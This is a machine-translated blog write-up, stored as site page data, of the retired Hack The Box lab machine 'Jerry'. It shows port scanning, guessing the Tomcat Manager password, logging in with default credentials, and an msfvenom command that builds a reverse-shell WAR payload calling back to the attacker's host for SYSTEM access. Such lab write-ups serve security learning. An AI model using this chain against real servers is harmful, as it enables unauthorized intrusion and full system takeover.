{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-jerry-en","result":{"data":{"markdownRemark":{"id":"e28652c1-1fbe-52a5-ab69-e80fa9dc6d98","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-jerry\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: none; background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Jerry”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg 
aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#gaining-a-shell\">Gaining a Shell</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" 
focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I started with a port scan as usual.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.95 $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nStarting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2022</span>-07-31 05:46 PDT\nNote: Host seems down. If it is really up, but blocking our <span class=\"token function\">ping</span> probes, try -Pn\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">0</span> hosts up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">2.26</span> seconds</code></pre></div>\n<p>The host appeared to be down (possibly a false negative), so I added the <code class=\"language-text\">-Pn</code> option. 
This revealed that port 8080 was open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nStarting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2022</span>-07-31 05:46 PDT\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.10.95<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.23s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">999</span> filtered tcp ports <span class=\"token punctuation\">(</span>no-response<span class=\"token punctuation\">)</span>\nPORT     STATE SERVICE VERSION\n<span class=\"token number\">8080</span>/tcp <span class=\"token function\">open</span>  http    Apache Tomcat/Coyote JSP engine <span class=\"token number\">1.1</span>\n<span class=\"token operator\">|</span>_http-title: Apache Tomcat/7.0.88\n<span class=\"token operator\">|</span>_http-favicon: Apache Tomcat\n<span class=\"token operator\">|</span>_http-server-header: Apache-Coyote/1.1\n\nService detection performed. 
Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">31.08</span> seconds</code></pre></div>\n<p>Accessing it showed that <code class=\"language-text\">Apache Tomcat/7.0.88</code> was running.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 632px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/beb833177b865ccf390ec378d89668d2/084e2/image-20220731214938781.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 62.083333333333336%; position: relative; bottom: 0; left: 0; background-image: 
none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/beb833177b865ccf390ec378d89668d2/8ac56/image-20220731214938781.webp 240w,\n/static/beb833177b865ccf390ec378d89668d2/d3be9/image-20220731214938781.webp 480w,\n/static/beb833177b865ccf390ec378d89668d2/59680/image-20220731214938781.webp 632w\"\n              sizes=\"(max-width: 632px) 100vw, 632px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/beb833177b865ccf390ec378d89668d2/8ff5a/image-20220731214938781.png 240w,\n/static/beb833177b865ccf390ec378d89668d2/e85cb/image-20220731214938781.png 480w,\n/static/beb833177b865ccf390ec378d89668d2/084e2/image-20220731214938781.png 632w\"\n            sizes=\"(max-width: 632px) 100vw, 632px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/beb833177b865ccf390ec378d89668d2/084e2/image-20220731214938781.png\"\n            alt=\"image-20220731214938781\"\n            title=\"image-20220731214938781\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To look for vulnerabilities, I read through the <a href=\"https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.109\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Apache Tomcat 7 vulnerabilities</a> release notes.</p>\n<p>I found an RCE vulnerability, CVE-2019-0232, but unfortunately <code class=\"language-text\">cgi/ism.bat</code> did not exist on the target, so that exploit was not applicable.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4f5206ac1044c6f0ec39c271be54c073/7131f/image-20220731220827410.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.33333333333334%; position: relative; bottom: 0; left: 0; background-image: 
none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4f5206ac1044c6f0ec39c271be54c073/8ac56/image-20220731220827410.webp 240w,\n/static/4f5206ac1044c6f0ec39c271be54c073/d3be9/image-20220731220827410.webp 480w,\n/static/4f5206ac1044c6f0ec39c271be54c073/457aa/image-20220731220827410.webp 710w\"\n              sizes=\"(max-width: 710px) 100vw, 710px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4f5206ac1044c6f0ec39c271be54c073/8ff5a/image-20220731220827410.png 240w,\n/static/4f5206ac1044c6f0ec39c271be54c073/e85cb/image-20220731220827410.png 480w,\n/static/4f5206ac1044c6f0ec39c271be54c073/7131f/image-20220731220827410.png 710w\"\n            sizes=\"(max-width: 710px) 100vw, 710px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4f5206ac1044c6f0ec39c271be54c073/7131f/image-20220731220827410.png\"\n            alt=\"image-20220731220827410\"\n            title=\"image-20220731220827410\"\n            
loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The next vulnerability I found was <code class=\"language-text\">CNVD-2020-10487 (CVE-2020-1938)</code>, but the ajp13 port appeared to be filtered, so this one would not work either.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -T4 -Pn -p <span class=\"token number\">8009</span> <span class=\"token variable\">$RHOST</span>\nStarting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2022</span>-07-31 06:35 PDT\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.10.95<span class=\"token punctuation\">)</span>\nHost is up.\n\nPORT     STATE    SERVICE VERSION\n<span class=\"token number\">8009</span>/tcp filtered ajp13</code></pre></div>\n<p>So I kept looking for other entry points.</p>\n<p>There was a page called Manager App that required authentication.</p>\n<p>The default Tomcat credentials were reported to be admin with a blank password, but that did not work.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 896px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/945003f9cd978bda8d73741127f48139/4c42d/image-20220801083425426.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 39.583333333333336%; position: relative; bottom: 0; left: 0; background-image: 
none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/945003f9cd978bda8d73741127f48139/8ac56/image-20220801083425426.webp 240w,\n/static/945003f9cd978bda8d73741127f48139/d3be9/image-20220801083425426.webp 480w,\n/static/945003f9cd978bda8d73741127f48139/c1a89/image-20220801083425426.webp 896w\"\n              sizes=\"(max-width: 896px) 100vw, 896px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/945003f9cd978bda8d73741127f48139/8ff5a/image-20220801083425426.png 240w,\n/static/945003f9cd978bda8d73741127f48139/e85cb/image-20220801083425426.png 480w,\n/static/945003f9cd978bda8d73741127f48139/4c42d/image-20220801083425426.png 896w\"\n            sizes=\"(max-width: 896px) 100vw, 896px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/945003f9cd978bda8d73741127f48139/4c42d/image-20220801083425426.png\"\n            alt=\"image-20220801083425426\"\n            title=\"image-20220801083425426\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I ran a dictionary attack with the username set to admin, and found that the password was also <code class=\"language-text\">admin</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 958px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/b97f6/image-20220731232257018.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    
style=\"padding-bottom: 17.5%; position: relative; bottom: 0; left: 0; background-image: none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/8ac56/image-20220731232257018.webp 240w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/d3be9/image-20220731232257018.webp 480w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/cb8de/image-20220731232257018.webp 958w\"\n              sizes=\"(max-width: 958px) 100vw, 958px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/8ff5a/image-20220731232257018.png 240w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/e85cb/image-20220731232257018.png 480w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/b97f6/image-20220731232257018.png 958w\"\n            sizes=\"(max-width: 958px) 100vw, 958px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/b97f6/image-20220731232257018.png\"\n            alt=\"image-20220731232257018\"\n            title=\"image-20220731232257018\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Login succeeded, but it seemed I had no privileges.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; 
max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c5a2eb245f09de631893af9242dd8952/8affb/image-20220801083557346.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40.833333333333336%; position: relative; bottom: 0; left: 0; background-image: none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c5a2eb245f09de631893af9242dd8952/8ac56/image-20220801083557346.webp 240w,\n/static/c5a2eb245f09de631893af9242dd8952/d3be9/image-20220801083557346.webp 480w,\n/static/c5a2eb245f09de631893af9242dd8952/e46b2/image-20220801083557346.webp 960w,\n/static/c5a2eb245f09de631893af9242dd8952/a1214/image-20220801083557346.webp 1254w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c5a2eb245f09de631893af9242dd8952/8ff5a/image-20220801083557346.png 240w,\n/static/c5a2eb245f09de631893af9242dd8952/e85cb/image-20220801083557346.png 480w,\n/static/c5a2eb245f09de631893af9242dd8952/d9199/image-20220801083557346.png 960w,\n/static/c5a2eb245f09de631893af9242dd8952/8affb/image-20220801083557346.png 1254w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c5a2eb245f09de631893af9242dd8952/d9199/image-20220801083557346.png\"\n            alt=\"image-20220801083557346\"\n            title=\"image-20220801083557346\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I tried the credentials 
<code class=\"language-text\">tomcat/s3cret</code> shown in the Example section of that page, and was able to log in to the Manager App.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/c6671/image-20220801083738285.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 66.25%; position: relative; bottom: 0; left: 0; background-image: none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/8ac56/image-20220801083738285.webp 240w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/d3be9/image-20220801083738285.webp 480w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/e46b2/image-20220801083738285.webp 960w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/ea1d1/image-20220801083738285.webp 1129w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/8ff5a/image-20220801083738285.png 240w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/e85cb/image-20220801083738285.png 480w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/d9199/image-20220801083738285.png 960w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/c6671/image-20220801083738285.png 1129w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/d9199/image-20220801083738285.png\"\n            alt=\"image-20220801083738285\"\n    
        title=\"image-20220801083738285\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"gaining-a-shell\" style=\"position:relative;\"><a href=\"#gaining-a-shell\" aria-label=\"gaining a shell permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Gaining a Shell</h2>\n<p>Now that I had access to the Manager App, I looked for an exploit path.</p>\n<p>According to the following article, uploading a WAR file can be used to obtain a reverse shell.</p>\n<p>Reference: <a href=\"https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Multiple Ways to Exploit Tomcat Manager - Hacking Articles</a></p>\n<p>I created the payload with the following command:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">msfvenom -p java/jsp_shell_reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.4 <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4444</span> -f war <span class=\"token operator\">></span> shell.war</code></pre></div>\n<p>After uploading it, accessing <code class=\"language-text\">10.10.10.95:8080/shell</code> from a browser gave me a 
shell with SYSTEM privileges.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>For password attacks, it pays to build a list of patterns to try manually before resorting to brute force.</p>","fields":{"slug":"/hackthebox-windows-jerry-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-30","description":"A writeup of the retired HackTheBox machine 'Jerry'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Jerry (Easy/Windows)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-jerry-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}